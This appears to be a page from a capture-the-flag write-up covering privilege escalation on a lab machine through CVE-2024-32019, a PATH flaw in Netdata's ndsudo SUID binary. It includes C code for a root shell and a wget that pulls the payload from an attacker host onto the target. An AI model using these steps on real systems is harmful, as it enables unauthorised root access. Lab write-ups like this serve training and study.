CtrlK

Priv Esc

GitHub - dollarboysushil/CVE-2024-32019-Netdata-ndsudo-PATH-Vulnerability-Privilege-Escalation: CVE-2024-32019 is a high-severity local privilege escalation vulnerability in Netdata (versions >= 1.44.0-60 < 1.45.3), caused by insecure use of the PATH variable in the ndsudo SUID binary, allowing attackers to execute arbitrary commands as root.GitHub

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", NULL);
    return 0;
}

❯ vi nvme.c
❯ gcc nvme.c -o nvme

oliver@editor:~$ wget 10.10.14.4/nvme
--2025-09-20 05:20:04--  http://10.10.14.4/nvme
Connecting to 10.10.14.4:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16056 (16K) [text/plain]
Saving to: ‘nvme’

nvme                    100%[==============================>]  15.68K  --.-KB/s    in 0.04s

2025-09-20 05:20:04 (362 KB/s) - ‘nvme’ saved [16056/16056]

PreviousFoothold NextCredentials

Last updated 23 days ago

Was this helpful?